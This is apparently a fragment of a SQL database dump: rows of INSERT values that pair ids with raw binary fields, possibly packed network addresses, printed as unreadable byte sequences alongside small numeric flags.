(4231,'��6N','��6N',1,0,90,0),
(4232,'�;��','�;��',1,0,90,0),
(4233,'*G�\0\0\0\0\0\0\0\0\0\09','*G�\0\0\0\0\0\0\0\0\0\09',1,0,90,1),
(4234,'6%�l','6%�l',1,0,90,0),
(4235,'�Z�','�Z�',1,0,90,0),
(4236,'��6','��6',1,0,90,0),
(4237,'�>5B','�>5B',1,0,90,0),
(4238,'#Ľ�','#Ľ�',1,0,90,0),
(4239,'ÅD','ÅD',1,0,90,0),
(4240,'Am\\�','Am\\�',1,0,90,0),
(4241,'���','���',1,0,90,0),
(4242,'�NB|','�NB|',1,0,90,0),
(4243,'2t\"�','2t\"�',1,0,90,0),
(4244,'�TK','�TK',1,0,90,0),
(4245,'tv1^','tv1^',1,0,90,0),
(4246,'e��','e��',1,0,90,0),
(4247,'_ّ�','_ّ�',1,0,90,0),
(4248,'��\r','��\r',1,0,90,0),
(4249,'R���','R���',1,0,90,0),
(4250,'\"�!�','\"�!�',1,0,90,0),
(4251,'�@u�','�@u�',1,0,90,0),
(4252,'��Rk','��Rk',1,0,90,0),
(4253,'�j~\Z','�j~\Z',1,0,90,0),
(4254,'g�q','g�q',1,0,90,0),
(4255,'*G�\0\0\0\0\0\0\0\0\0\0P','*G�\0\0\0\0\0\0\0\0\0\0P',1,0,90,1),
(4256,'�~V','�~V',1,0,90,0),
(4257,'�ƈY','�ƈY',1,0,90,0),
(4258,'�[a�','�[a�',1,0,90,0),
(4259,'�h�c','�h�c',1,0,90,0),
(4260,'*G�\0\0\0\0\0\0\0\0\0\0.','*G�\0\0\0\0\0\0\0\0\0\0.',1,0,90,1),
(4261,'��1�','��1�',1,0,90,0),
(4262,'*G�\0\0\0\0\0\0\0\0\0\0*','*G�\0\0\0\0\0\0\0\0\0\0*',1,0,90,1),
(4263,'.e5.','.e5.',1,0,90,0),
(4264,'��:\r','��:\r',1,0,90,0),
(4265,'*�\n5\0\0\0\0\0\0\0','*�\n5\0\0\0\0\0\0\0',1,0,90,1),
(4266,'���<','���<',1,0,90,0),
(4267,'�*�','�*�',1,0,90,0),
(4268,'*G�\0��\n����','*G�\0��\n����',1,0,90,1),
(4269,'.�R','.�R',1,0,90,0),
(4270,'�:Y','�:Y',1,0,90,0),
(4271,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4272,'\n��','\n��',1,0,90,0),
(4273,'��Ti','��Ti',1,0,90,0),
(4274,'�]�&','�]�&',1,0,90,0),
(4275,'˯ \Z','˯ \Z',1,0,90,0),
(4276,'���','���',1,0,90,0),
(4277,'\"M;','\"M;',1,0,90,0),
(4278,'#�+s','#�+s',1,0,90,0),
(4279,'��\\','��\\',1,0,90,0),
(4280,'�D;�','�D;�',1,0,90,0),
(4281,'\"���','\"���',1,0,90,0),
(4282,'����','����',1,0,90,0),
(4283,'=IJ�','=IJ�',1,0,90,0),
(4284,'Yu�e','Yu�e',1,0,90,0),
(4285,'��*�','��*�',1,0,90,0),
(4286,'.�( ','.�( ',1,0,90,0),
(4287,'�#��','�#��',1,0,90,0),
(4288,'��n','��n',1,0,90,0),
(4289,'-O�','-O�',1,0,90,0),
(4290,'&\0<\0\0\0\0\0�<�����5','&\0<\0\0\0\0\0�<�����5',1,0,90,1),
(4291,'n*��','n*��',1,0,90,0),
(4292,'4�','4�',1,0,90,0),
(4293,'�w��','�w��',1,0,90,0),
(4294,'C+`','C+`',1,0,90,0),
(4295,'DAy�','DAy�',1,0,90,0),
(4296,'�U�','�U�',1,0,90,0),
(4297,'���\\','���\\',1,0,90,0),
(4298,'�R�','�R�',1,0,90,0),
(4299,'`','`',1,0,90,0),
(4300,')�',')�',1,0,90,0),
(4301,'-��','-��',1,0,90,0),
(4302,'v�.�','v�.�',1,0,90,0),
(4303,'gY>b','gY>b',1,0,90,0),
(4304,'gyI#','gyI#',1,0,90,0),
(4305,'�s~\"','�s~\"',1,0,90,0),
(4306,'O�','O�',1,0,90,0),
(4307,'��\0�','��\0�',1,0,90,0),
(4308,'��?S','��?S',1,0,90,0),
(4309,'H�}�','H�}�',1,0,90,0),
(4310,'���0','���0',1,0,90,0),
(4311,'g��','g��',1,0,90,0),
(4312,'#�F&','#�F&',1,0,90,0),
(4313,'�f��','�f��',1,0,90,0),
(4314,'\"Jç','\"Jç',1,0,90,0),
(4315,'�sc�','�sc�',1,0,90,0),
(4316,'gj��','gj��',1,0,90,0),
(4317,'\"J+;','\"J+;',1,0,90,0),
(4318,'6��','6��',1,0,90,0),
(4319,'���#','���#',1,0,90,0),
(4320,'���','���',1,0,90,0),
(4321,'���','���',1,0,90,0),
(4322,'�:��','�:��',1,0,90,0),
(4323,'T<�','T<�',1,0,90,0),
(4324,'���','���',1,0,90,0),
(4325,'Y(�','Y(�',1,0,90,0),
(4326,'�\0��','�\0��',1,0,90,0),
(4327,'Q!�','Q!�',1,0,90,0),
(4328,'\"�I(','\"�I(',1,0,90,0),
(4329,'C���','C���',1,0,90,0),
(4330,'\rY>','\rY>',1,0,90,0),
(4331,'�ƾc','�ƾc',1,0,90,0),
(4332,'��f:','��f:',1,0,90,0),
(4333,'�#+�','�#+�',1,0,90,0),
(4334,'�Fs�','�Fs�',1,0,90,0),
(4335,'\"���','\"���',1,0,90,0),
(4336,'h��%','h��%',1,0,90,0),
(4337,'����','����',1,0,90,0),
(4338,'N.�Y','N.�Y',1,0,90,0),
(4339,'٥��','٥��',1,0,90,0),
(4340,'D��>','D��>',1,0,90,0),
(4341,'U��`','U��`',1,0,90,0),
(4342,'N//=','N//=',1,0,90,0),
(4343,'D��','D��',1,0,90,0),
(4344,'#�}','#�}',1,0,90,0),
(4345,'J�','J�',1,0,90,0),
(4346,'�7�','�7�',1,0,90,0),
(4347,'�bf�','�bf�',1,0,90,0),
(4348,'N/','N/',1,0,90,0),
(4349,'[�ڨ','[�ڨ',1,0,90,0),
(4350,'��','��',1,0,90,0),
(4351,'�7�','�7�',1,0,90,0),
(4352,'3D�','3D�',1,0,90,0),
(4353,'��','��',1,0,90,0),
(4354,'Al�+','Al�+',1,0,90,0),
(4355,'��6','��6',1,0,90,0),
(4356,'RgW#','RgW#',1,0,90,0),
(4357,'��/�','��/�',1,0,90,0),
(4358,'_�<�','_�<�',1,0,90,0),
(4359,'W�9','W�9',1,0,90,0),
(4360,'�','�',1,0,90,0),
(4361,'��','��',1,0,90,0),
(4362,' AA8\0\0\0B�8_',' AA8\0\0\0B�8_',1,0,90,1),
(4363,'�,M-','�,M-',1,0,90,0),
(4364,'����','����',1,0,90,0),
(4365,'��%','��%',1,0,90,0),
(4366,'�%�','�%�',1,0,90,0),
(4367,'\rC��','\rC��',1,0,90,0),
(4368,'(N��','(N��',1,0,90,0),
(4369,'��J�','��J�',1,0,90,0),
(4370,'(V`�','(V`�',1,0,90,0),
(4371,'-Q\'h','-Q\'h',1,0,90,0),
(4372,'���%','���%',1,0,90,0),
(4373,'�G�Y','�G�Y',1,0,90,0),
(4374,' K��!\0\0\0\0\0\0\0',' K��!\0\0\0\0\0\0\0',1,0,90,1),
(4375,'E9�\Z','E9�\Z',1,0,90,0),
(4376,'�7�','�7�',1,0,90,0),
(4377,'νJ$','νJ$',1,0,90,0),
(4378,'\Z�','\Z�',1,0,90,0),
(4379,'-Q\'�','-Q\'�',1,0,90,0),
(4380,'-Q\'�','-Q\'�',1,0,90,0),
(4381,'�2�\n','�2�\n',1,0,90,0),
(4382,'��Х','��Х',1,0,90,0),
(4383,'-Q\'�','-Q\'�',1,0,90,0),
(4384,'���?','���?',1,0,90,0),
(4385,'ْR�','ْR�',1,0,90,0),
(4386,'-Q\'�','-Q\'�',1,0,90,0),
(4387,'-Q\'�','-Q\'�',1,0,90,0),
(4388,'�7�n','�7�n',1,0,90,0),
(4389,'�^�1','�^�1',1,0,90,0),
(4390,'r�','r�',1,0,90,0),
(4391,'-Q\'i','-Q\'i',1,0,90,0),
(4392,'��e�','��e�',1,0,90,0),
(4393,'�Y�','�Y�',1,0,90,0),
(4394,'4��','4��',1,0,90,0),
(4395,'Wy��','Wy��',1,0,90,0),
(4396,'4�Z�','4�Z�',1,0,90,0),
(4397,'���c','���c',1,0,90,0),
(4398,'4�[=','4�[=',1,0,90,0),
(4399,'��\n�','��\n�',1,0,90,0),
(4400,'(zr','(zr',1,0,90,0),
(4401,'-Q\'�','-Q\'�',1,0,90,0),
(4402,'��-�','��-�',1,0,90,0),
(4403,'�*ª','�*ª',1,0,90,0),
(4404,'-Q\'�','-Q\'�',1,0,90,0),
(4405,'(znX','(znX',1,0,90,0),
(4406,'��kU','��kU',1,0,90,0),
(4407,'(zsZ','(zsZ',1,0,90,0),
(4408,'g�%�','g�%�',1,0,90,0),
(4409,'��','��',1,0,90,0),
(4410,'��9x','��9x',1,0,90,0),
(4411,'-Q\'�','-Q\'�',1,0,90,0),
(4412,'^���','^���',1,0,90,0),
(4413,'�bI','�bI',1,0,90,0),
(4414,'-Q\'�','-Q\'�',1,0,90,0),
(4415,'��','��',1,0,90,0),
(4416,'(N�','(N�',1,0,90,0),
(4417,'-B�','-B�',1,0,90,0),
(4418,'��`#','��`#',1,0,90,0),
(4419,'�A','�A',1,0,90,0),
(4420,'%���','%���',1,0,90,0),
(4421,'�,�7','�,�7',1,0,90,0),
(4422,'�FQ�','�FQ�',1,0,90,0),
(4423,'-Q\'�','-Q\'�',1,0,90,0),
(4424,'^�u�','^�u�',1,0,90,0),
(4425,'-Q\'�','-Q\'�',1,0,90,0),
(4426,'-Q\'�','-Q\'�',1,0,90,0),
(4427,'(z{','(z{',1,0,90,0),
(4428,'^�u�','^�u�',1,0,90,0),
(4429,'-Q\'�','-Q\'�',1,0,90,0),
(4430,'-Q\'�','-Q\'�',1,0,90,0),
(4431,'&�\0�V\0\0\0\0\n�)\"','&�\0�V\0\0\0\0\n�)\"',1,0,90,1),
(4432,'��[�','��[�',1,0,90,0),
(4433,']{v�',']{v�',1,0,90,0),
(4434,'��|�','��|�',1,0,90,0),
(4435,'-Q\'�','-Q\'�',1,0,90,0),
(4436,'(zj�','(zj�',1,0,90,0),
(4437,'���','���',1,0,90,0),
(4438,'UЈ[','UЈ[',1,0,90,0),
(4439,'�Fl�','�Fl�',1,0,90,0),
(4440,'-Q\'�','-Q\'�',1,0,90,0),
(4441,'�a��','�a��',1,0,90,0),
(4442,'(N��','(N��',1,0,90,0),
(4443,'-Q\'�','-Q\'�',1,0,90,0),
(4444,'ِi�','ِi�',1,0,90,0),
(4445,'�� O','�� O',1,0,90,0),
(4446,'��MJ','��MJ',1,0,90,0),
(4447,'��*','��*',1,0,90,0),
(4448,'-Q\'�','-Q\'�',1,0,90,0),
(4449,'-Q\'','-Q\'',1,0,90,0),
(4450,'<�|r','<�|r',1,0,90,0),
(4451,'�Y�','�Y�',1,0,90,0),
(4452,'r�','r�',1,0,90,0),
(4453,'�f3�','�f3�',1,0,90,0),
(4454,'���','���',1,0,90,0),
(4455,'(ztJ','(ztJ',1,0,90,0),
(4456,'-Q\'�','-Q\'�',1,0,90,0),
(4457,'��I*','��I*',1,0,90,0),
(4458,'(N�\n','(N�\n',1,0,90,0),
(4459,'-Q\'�','-Q\'�',1,0,90,0),
(4460,'Y���','Y���',1,0,90,0),
(4461,'4�[�','4�[�',1,0,90,0),
(4462,'Uِ�','Uِ�',1,0,90,0),
(4463,'(E��','(E��',1,0,90,0),
(4464,'��{�','��{�',1,0,90,0),
(4465,'4���','4���',1,0,90,0),
(4466,'|\Z','|\Z',1,0,90,0),
(4467,'��Q�','��Q�',1,0,90,0),
(4468,'(z~Q','(z~Q',1,0,90,0),
(4469,'��z','��z',1,0,90,0),
(4470,'(N��','(N��',1,0,90,0),
(4471,'\"H�','\"H�',1,0,90,0),
(4472,'Wy�','Wy�',1,0,90,0),
(4473,'�~z�','�~z�',1,0,90,0),
(4474,' :_',' :_',1,0,90,0),
(4475,'4�[u','4�[u',1,0,90,0),
(4476,'�o','�o',1,0,90,0),
(4477,'r�','r�',1,0,90,0),
(4478,'-Q\'�','-Q\'�',1,0,90,0),
(4479,'�,�t','�,�t',1,0,90,0),
(4480,'(N�\Z','(N�\Z',1,0,90,0),
(4481,'(zo�','(zo�',1,0,90,0),
(4482,'����','����',1,0,90,0),
(4483,'(Mj8','(Mj8',1,0,90,0),
(4484,'|{L�','|{L�',1,0,90,0),
(4485,'o���','o���',1,0,90,0),
(4486,'_��','_��',1,0,90,0),
(4487,'�R�','�R�',1,0,90,0),
(4488,'4�b�','4�b�',1,0,90,0),
(4489,'\"�A�','\"�A�',1,0,90,0),
(4490,'&\05�7\0w�/��','&\05�7\0w�/��',1,0,90,1),
(4491,'�]i�','�]i�',1,0,90,0),
(4492,'�Dus','�Dus',1,0,90,0),
(4493,'��','��',1,0,90,0),
(4494,'*G�\0�\0\0\0\0\0\0\0','*G�\0�\0\0\0\0\0\0\0',1,0,90,1),
(4495,'\"���','\"���',1,0,90,0),
(4496,'�@��','�@��',1,0,90,0),
(4497,'\"��\0','\"��\0',1,0,90,0),
(4498,'���o','���o',1,0,90,0),
(4499,'\\0�f','\\0�f',1,0,90,0),
(4500,'#�a','#�a',1,0,90,0),
(4501,'�Qu','�Qu',1,0,90,0),
(4502,'6��','6��',1,0,90,0),
(4503,'�j��','�j��',1,0,90,0),
(4504,'�K�k','�K�k',1,0,90,0),
(4505,'�X5�','�X5�',1,0,90,0),
(4506,'X�t\\','X�t\\',1,0,90,0),
(4507,'*r�\0\0\0\0\'��\0 �','*r�\0\0\0\0\'��\0 �',1,0,90,1),
(4508,'#�mg','#�mg',1,0,90,0),
(4509,'#�(','#�(',1,0,90,0),
(4510,'��h�','��h�',1,0,90,0),
(4511,'�H0','�H0',1,0,90,0),
(4512,'U\n�*','U\n�*',1,0,90,0),
(4513,'���','���',1,0,90,0),
(4514,'R���','R���',1,0,90,0),
(4515,'�kp�','�kp�',1,0,90,0),
(4516,'���e','���e',1,0,90,0),
(4517,'+��','+��',1,0,90,0),
(4518,'[�o','[�o',1,0,90,0),
(4519,'��4V','��4V',1,0,90,0),
(4520,'#���','#���',1,0,90,0),
(4521,'4Y�@','4Y�@',1,0,90,0),
(4522,'#���','#���',1,0,90,0),
(4523,'QF�\'','QF�\'',1,0,90,0),
(4524,'z�Y','z�Y',1,0,90,0),
(4525,'���','���',1,0,90,0),
(4526,'\\��','\\��',1,0,90,0),
(4527,'�VR�','�VR�',1,0,90,0),
(4528,'g��','g��',1,0,90,0),
(4529,'U��5','U��5',1,0,90,0),
(4530,'%�5','%�5',1,0,90,0),
(4531,'���2','���2',1,0,90,0),
(4532,'U���','U���',1,0,90,0),
(4533,'#�l�','#�l�',1,0,90,0),
(4534,'���','���',1,0,90,0),
(4535,'Ȗ��','Ȗ��',1,0,90,0),
(4536,'F\'��','F\'��',1,0,90,0),
(4537,'�\\P/','�\\P/',1,0,90,0),
(4538,'\"�9A','\"�9A',1,0,90,0),
(4539,'���K','���K',1,0,90,0),
(4540,'g��','g��',1,0,90,0),
(4541,'ё1�','ё1�',1,0,90,0),
(4542,'t��k','t��k',1,0,90,0),
(4543,'�H�','�H�',1,0,90,0),
(4544,' A�\0�\0\0\0\0\0\0\0\0',' A�\0�\0\0\0\0\0\0\0\0',1,0,90,1),
(4545,'� ','� ',1,0,90,0),
(4546,'�\\/','�\\/',1,0,90,0),
(4547,'ˉnB','ˉnB',1,0,90,0),
(4548,'���:','���:',1,0,90,0),
(4549,'Ú�(','Ú�(',1,0,90,0),
(4550,'-_��','-_��',1,0,90,0),
(4551,'*G�\0\n\0\0\0\0\0\0\0\0\0','*G�\0\n\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4552,'B��','B��',1,0,90,0),
(4553,'-�/o','-�/o',1,0,90,0),
(4554,'MQ�B','MQ�B',1,0,90,0),
(4555,']r��',']r��',1,0,90,0),
(4556,'g��','g��',1,0,90,0),
(4557,'g�Ѝ','g�Ѝ',1,0,90,0),
(4558,'���P','���P',1,0,90,0),
(4559,'g�L�','g�L�',1,0,90,0),
(4560,'\'ix�','\'ix�',1,0,90,0),
(4561,'D��Q','D��Q',1,0,90,0),
(4562,'���','���',1,0,90,0),
(4563,'Ľ,','Ľ,',1,0,90,0),
(4564,'-ZJ','-ZJ',1,0,90,0),
(4565,'���','���',1,0,90,0),
(4566,'_�$�','_�$�',1,0,90,0),
(4567,'�_4','�_4',1,0,90,0),
(4568,'T� ','T� ',1,0,90,0),
(4569,'���','���',1,0,90,0),
(4570,'3�c$','3�c$',1,0,90,0),
(4571,'3O�j','3O�j',1,0,90,0),
(4572,'*G�\0\0 \0\0\0\0\0\0\0#','*G�\0\0 \0\0\0\0\0\0\0#',1,0,90,1),
(4573,'\"]�E','\"]�E',1,0,90,0),
(4574,'O�){','O�){',1,0,90,0),
(4575,'�ƞ�','�ƞ�',1,0,90,0),
(4576,'e+0','e+0',1,0,90,0),
(4577,'�+�','�+�',1,0,90,0),
(4578,'�\\�4','�\\�4',1,0,90,0),
(4579,'-Q�M','-Q�M',1,0,90,0),
(4580,'��`{','��`{',1,0,90,0),
(4581,'Yt�T','Yt�T',1,0,90,0),
(4582,'��+\"','��+\"',1,0,90,0),
(4583,'�; �','�; �',1,0,90,0),
(4584,'h� v','h� v',1,0,90,0),
(4585,'E1p@','E1p@',1,0,90,0),
(4586,'\\rb�','\\rb�',1,0,90,0),
(4587,'�,ME','�,ME',1,0,90,0),
(4588,'$\0�\0CP\0���','$\0�\0CP\0���',1,0,90,1),
(4589,'J/�','J/�',1,0,90,0),
(4590,'\\�!�','\\�!�',1,0,90,0),
(4591,'U���','U���',1,0,90,0),
(4592,'�;��','�;��',1,0,90,0),
(4593,'_�hz','_�hz',1,0,90,0),
(4594,'|�\nf','|�\nf',1,0,90,0),
(4595,'�X�}','�X�}',1,0,90,0),
(4596,'��;','��;',1,0,90,0),
(4597,'��N�','��N�',1,0,90,0),
(4598,'C�^','C�^',1,0,90,0),
(4599,'�A��','�A��',1,0,90,0),
(4600,'�zi�','�zi�',1,0,90,0),
(4601,'�+J','�+J',1,0,90,0),
(4602,'[�','[�',1,0,90,0),
(4603,'�\\��','�\\��',1,0,90,0),
(4604,'�ǯP','�ǯP',1,0,90,0),
(4605,'���c','���c',1,0,90,0),
(4606,'�','�',1,0,90,0),
(4607,'���','���',1,0,90,0),
(4608,'g$V','g$V',1,0,90,0),
(4609,'2�?','2�?',1,0,90,0),
(4610,'g�!','g�!',1,0,90,0),
(4611,'��8','��8',1,0,90,0),
(4612,'g�\nS','g�\nS',1,0,90,0),
(4613,'g��{','g��{',1,0,90,0),
(4614,'_�','_�',1,0,90,0),
(4615,'+�oT','+�oT',1,0,90,0),
(4616,'c[�S','c[�S',1,0,90,0),
(4617,'A��','A��',1,0,90,0),
(4618,'-L��','-L��',1,0,90,0),
(4619,'g��G','g��G',1,0,90,0),
(4620,'۾h','۾h',1,0,90,0),
(4621,'ۯ=','ۯ=',1,0,90,0),
(4622,'�h�','�h�',1,0,90,0),
(4623,'�','�',1,0,90,0),
(4624,'��Y','��Y',1,0,90,0),
(4625,' � }>Gַ,^�@\0\0',' � }>Gַ,^�@\0\0',1,0,90,1),
(4626,'M D�','M D�',1,0,90,0),
(4627,'��V�','��V�',1,0,90,0),
(4628,'tm- ','tm- ',1,0,90,0),
(4629,'sI��','sI��',1,0,90,0),
(4630,'g�֠','g�֠',1,0,90,0),
(4631,'���Y','���Y',1,0,90,0),
(4632,'*G�\0.7\0\0\0\0\0\0\0','*G�\0.7\0\0\0\0\0\0\0',1,0,90,1),
(4633,'*G�\0EF\0\0\0\0\0\0\0','*G�\0EF\0\0\0\0\0\0\0',1,0,90,1),
(4634,'*\0ր\0 \0P\0\0\0\0\0\0b�','*\0ր\0 \0P\0\0\0\0\0\0b�',1,0,90,1),
(4635,'|r�','|r�',1,0,90,0),
(4636,'/�u�','/�u�',1,0,90,0),
(4637,'(M=�','(M=�',1,0,90,0),
(4638,' Bu\0\0\0E1pC',' Bu\0\0\0E1pC',1,0,90,1),
(4639,'뵸','뵸',1,0,90,0),
(4640,'g7','g7',1,0,90,0),
(4641,'z�N','z�N',1,0,90,0),
(4642,'% >','% >',1,0,90,0),
(4643,'*G�\0�\Z\0\0\0\0\0\0\0','*G�\0�\Z\0\0\0\0\0\0\0',1,0,90,1),
(4644,'ǧ��','ǧ��',1,0,90,0),
(4645,'*~\0\0\0\0�<�����','*~\0\0\0\0�<�����',1,0,90,1),
(4646,'�a�6','�a�6',1,0,90,0),
(4647,'��Z','��Z',1,0,90,0),
(4648,'>��,','>��,',1,0,90,0),
(4649,'6�@�','6�@�',1,0,90,0),
(4650,'��8�','��8�',1,0,90,0),
(4651,'C�m','C�m',1,0,90,0),
(4652,'�@��','�@��',1,0,90,0),
(4653,'�D�','�D�',1,0,90,0),
(4654,'��','��',1,0,90,0),
(4655,'��t','��t',1,0,90,0),
(4656,'��','��',1,0,90,0),
(4657,'�NB�','�NB�',1,0,90,0),
(4658,'xM,�','xM,�',1,0,90,0),
(4659,'�e�','�e�',1,0,90,0),
(4660,'kjo','kjo',1,0,90,0),
(4661,'*G�\0��\0\0\0\0\0\0\0','*G�\0��\0\0\0\0\0\0\0',1,0,90,1),
(4662,'�eZ','�eZ',1,0,90,0),
(4663,'�_��','�_��',1,0,90,0),
(4664,'�4�','�4�',1,0,90,0),
(4665,')��',')��',1,0,90,0),
(4666,'.�2','.�2',1,0,90,0),
(4667,'��Y','��Y',1,0,90,0),
(4668,'٠k�','٠k�',1,0,90,0),
(4669,'��K','��K',1,0,90,0),
(4670,',�>',',�>',1,0,90,0),
(4671,'g��','g��',1,0,90,0),
(4672,'#ݛx','#ݛx',1,0,90,0),
(4673,'�?','�?',1,0,90,0),
(4674,'-�','-�',1,0,90,0),
(4675,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4676,'@�^$','@�^$',1,0,90,0),
(4677,'����','����',1,0,90,0),
(4678,'��;�','��;�',1,0,90,0),
(4679,'�d�X','�d�X',1,0,90,0),
(4680,'�;\r�','�;\r�',1,0,90,0),
(4681,'1��;','1��;',1,0,90,0),
(4682,'gD�|','gD�|',1,0,90,0),
(4683,'U���','U���',1,0,90,0),
(4684,'g)A�','g)A�',1,0,90,0),
(4685,'\"~�(','\"~�(',1,0,90,0),
(4686,'^��','^��',1,0,90,0),
(4687,'�A�','�A�',1,0,90,0),
(4688,'TK�D','TK�D',1,0,90,0),
(4689,'�!�_','�!�_',1,0,90,0),
(4690,'s[A','s[A',1,0,90,0),
(4691,'�E��','�E��',1,0,90,0),
(4692,'U��/','U��/',1,0,90,0),
(4693,'��E�','��E�',1,0,90,0),
(4694,'. �X','. �X',1,0,90,0),
(4695,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4696,'6L(�','6L(�',1,0,90,0),
(4697,'�J�','�J�',1,0,90,0),
(4698,'g�','g�',1,0,90,0),
(4699,'�j��','�j��',1,0,90,0),
(4700,'fY','fY',1,0,90,0),
(4701,'���%','���%',1,0,90,0),
(4702,'U��I','U��I',1,0,90,0),
(4703,'[���','[���',1,0,90,0),
(4704,'B:','B:',1,0,90,0),
(4705,'@㪼','@㪼',1,0,90,0),
(4706,'B-�z','B-�z',1,0,90,0),
(4707,'£#R','£#R',1,0,90,0),
(4708,'#�n�','#�n�',1,0,90,0),
(4709,'�[@)','�[@)',1,0,90,0),
(4710,'V0\0 ','V0\0 ',1,0,90,0),
(4711,'�\\1','�\\1',1,0,90,0),
(4712,'��','��',1,0,90,0),
(4713,'|m�','|m�',1,0,90,0),
(4714,'��','��',1,0,90,0),
(4715,'����','����',1,0,90,0),
(4716,' �yT\0����',' �yT\0����',1,0,90,1),
(4717,'*G�\0\0\0\0\0\0\0\0\0\03','*G�\0\0\0\0\0\0\0\0\0\03',1,0,90,1),
(4718,'\"�','\"�',1,0,90,0),
(4719,'*G�\0\0\0\0\0\0\0\0\0\0!','*G�\0\0\0\0\0\0\0\0\0\0!',1,0,90,1),
(4720,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4721,'9Y','9Y',1,0,90,0),
(4722,'\"��','\"��',1,0,90,0),
(4723,'զVm','զVm',1,0,90,0),
(4724,'*��$\0\0\0\0\0\0\0','*��$\0\0\0\0\0\0\0',1,0,90,1),
(4725,'m_�','m_�',1,0,90,0),
(4726,'gl�4','gl�4',1,0,90,0),
(4727,'�2','�2',1,0,90,0),
(4728,'-L�n','-L�n',1,0,90,0),
(4729,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4730,'�~ۖ','�~ۖ',1,0,90,0),
(4731,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4732,'�e�3','�e�3',1,0,90,0),
(4733,'-RJ�','-RJ�',1,0,90,0),
(4734,'X�ty','X�ty',1,0,90,0),
(4735,'*G�\0��^oi���G!','*G�\0��^oi���G!',1,0,90,1),
(4736,'R���','R���',1,0,90,0),
(4737,'�CH�','�CH�',1,0,90,0),
(4738,'ó�.','ó�.',1,0,90,0),
(4739,'�풧','�풧',1,0,90,0),
(4740,'�k�','�k�',1,0,90,0),
(4741,'��FM','��FM',1,0,90,0),
(4742,'.��','.��',1,0,90,0),
(4743,'-�.�','-�.�',1,0,90,0),
(4744,'�h�','�h�',1,0,90,0),
(4745,'O|Lz','O|Lz',1,0,90,0),
(4746,'-]�','-]�',1,0,90,0),
(4747,'B��','B��',1,0,90,0),
(4748,'�ja-','�ja-',1,0,90,0),
(4749,'�J�','�J�',1,0,90,0),
(4750,'�(¡','�(¡',1,0,90,0),
(4751,'B�e','B�e',1,0,90,0),
(4752,'�QwO','�QwO',1,0,90,0),
(4753,'�� i','�� i',1,0,90,0),
(4754,'����','����',1,0,90,0),
(4755,'�:}','�:}',1,0,90,0),
(4756,'Yu','Yu',1,0,90,0),
(4757,'*G�\0\0\0\0\0\0\0\0\0\0G','*G�\0\0\0\0\0\0\0\0\0\0G',1,0,90,1),
(4758,'|z�','|z�',1,0,90,0),
(4759,'ՈT�','ՈT�',1,0,90,0),
(4760,'��','��',1,0,90,0),
(4761,'��*�','��*�',1,0,90,0),
(4762,'h�N','h�N',1,0,90,0),
(4763,'\"�g','\"�g',1,0,90,0),
(4764,'U\n��','U\n��',1,0,90,0),
(4765,'��J','��J',1,0,90,0),
(4766,'���(','���(',1,0,90,0),
(4767,'D���','D���',1,0,90,0),
(4768,'*G�\0��\0\0\0\0\0\0\0','*G�\0��\0\0\0\0\0\0\0',1,0,90,1),
(4769,'�A��','�A��',1,0,90,0),
(4770,'*G�\0\0\0\0\0\0\0\0\0\00','*G�\0\0\0\0\0\0\0\0\0\00',1,0,90,1),
(4771,'^f�@','^f�@',1,0,90,0),
(4772,'#�W','#�W',1,0,90,0),
(4773,'��4T','��4T',1,0,90,0),
(4774,'E���','E���',1,0,90,0),
(4775,'�','�',1,0,90,0),
(4776,'&�\0�g\0\0\0\0��','&�\0�g\0\0\0\0��',1,0,90,1),
(4777,'&�\0\0\0\0\0\r�QS','&�\0\0\0\0\0\r�QS',1,0,90,1),
(4778,'�찍','�찍',1,0,90,0),
(4779,'&�\0�\0\0\0\0�Q{','&�\0�\0\0\0\0�Q{',1,0,90,1),
(4780,'���','���',1,0,90,0),
(4781,' ��T\0�����',' ��T\0�����',1,0,90,1),
(4782,'�*x�','�*x�',1,0,90,0),
(4783,'�q�','�q�',1,0,90,0),
(4784,'��Z','��Z',1,0,90,0),
(4785,'$)Y','$)Y',1,0,90,0),
(4786,'�q��','�q��',1,0,90,0),
(4787,'�+v(','�+v(',1,0,90,0),
(4788,'Kw�w','Kw�w',1,0,90,0),
(4789,'�+h','�+h',1,0,90,0),
(4790,'#�;','#�;',1,0,90,0),
(4791,'�q��','�q��',1,0,90,0),
(4792,'&��\0\0�\0\0\0\0)\0','&��\0\0�\0\0\0\0)\0',1,0,90,1),
(4793,'����','����',1,0,90,0),
(4794,'&�\0\0\0\0\0ak','&�\0\0\0\0\0ak',1,0,90,1),
(4795,'&\0<\0\0\0\0�<�����U','&\0<\0\0\0\0�<�����U',1,0,90,1),
(4796,'E��{','E��{',1,0,90,0),
(4797,'�+z�','�+z�',1,0,90,0),
(4798,'&�\0�\0\0\0\0�m','&�\0�\0\0\0\0�m',1,0,90,1),
(4799,'&�\0�w\0\0\0\0\n�j','&�\0�w\0\0\0\0\n�j',1,0,90,1),
(4800,'&�\0\0\0\0\0b5','&�\0\0\0\0\0b5',1,0,90,1),
(4801,'M�:�','M�:�',1,0,90,0),
(4802,'&S\0\0\0\0\0\0\0\0%�','&S\0\0\0\0\0\0\0\0%�',1,0,90,1),
(4803,'h�L�','h�L�',1,0,90,0),
(4804,'��q�','��q�',1,0,90,0),
(4805,'�m)�','�m)�',1,0,90,0),
(4806,'��','��',1,0,90,0),
(4807,'�6~�','�6~�',1,0,90,0),
(4808,'\'j\Z','\'j\Z',1,0,90,0),
(4809,'�ɵ5','�ɵ5',1,0,90,0),
(4810,'(z�\n','(z�\n',1,0,90,0),
(4811,'E��e','E��e',1,0,90,0),
(4812,'M3','M3',1,0,90,0),
(4813,'���','���',1,0,90,0),
(4814,'��n','��n',1,0,90,0),
(4815,'N.}','N.}',1,0,90,0),
(4816,'զVJ','զVJ',1,0,90,0),
(4817,'Յh8','Յh8',1,0,90,0),
(4818,'�=�','�=�',1,0,90,0),
(4819,'�#��','�#��',1,0,90,0),
(4820,'���A','���A',1,0,90,0),
(4821,'�Tړ','�Tړ',1,0,90,0),
